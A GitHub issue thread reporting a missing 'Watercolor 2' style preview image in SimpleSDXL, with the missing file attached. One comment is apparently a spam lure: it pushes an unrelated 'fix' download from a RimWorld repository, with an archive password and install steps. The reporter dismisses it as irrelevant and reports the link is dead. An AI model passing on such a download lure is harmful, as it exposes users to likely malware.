### ISSUE TITLE
[Bug]: Image for the Watercolor 2 Style is Missing

### ISSUE THREAD

**Issue by DavidDragonsage** [metercai/SimpleSDXL#63]
### Checklist

- [X] The issue has not been resolved by following the [troubleshooting guide](https://github.com/lllyasviel/Fooocus/blob/main/troubleshoot.md)
- [X] The issue exists on a clean installation of Fooocus
- [X] The issue exists in the current version of Fooocus
- [X] The issue has not been reported before recently
- [ ] The issue has been reported before but has not been fixed yet

### What happened?

When you hover the mouse over the Watercolor 2 style you get a blank frame.

### Steps to reproduce the problem

1) Go to the Styles tab
2) Search for "watercolor"
3) Hover the mouse over the Watercolor 2 style

### What should have happened?

The Watercolor 2 image should have popped up

### What browsers do you use to access Fooocus?

Mozilla Firefox

### Where are you running Fooocus?

Locally

### What operating system are you using?

Windows 10

### Console logs

```Shell
Not required
```

### Additional information

I have attached the file "watercolor_2.jpg" from mainline Fooocus. It just needs to be installed in 
C:\SimpleAI\SimpleSDXL2_win_0820\SimpleSDXL\sdxl_styles\samples
then everything will be fine.

![watercolor_2](https://github.com/user-attachments/assets/6f81c587-357d-4276-bd34-6c4b262412b3)

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by DavidDragonsage** [comment]
Your comment appears to be irrelevant to this bug, which is a very simple one that effects SimpleSDXL, not RimWorld. The link cannot be found ("Page not found"). I think you have posted here in error.

**Comment by metercai** [comment]
thanks a lot

**Comment by DavidDragonsage** [comment]
You are welcome. If only all bugs were this easy!
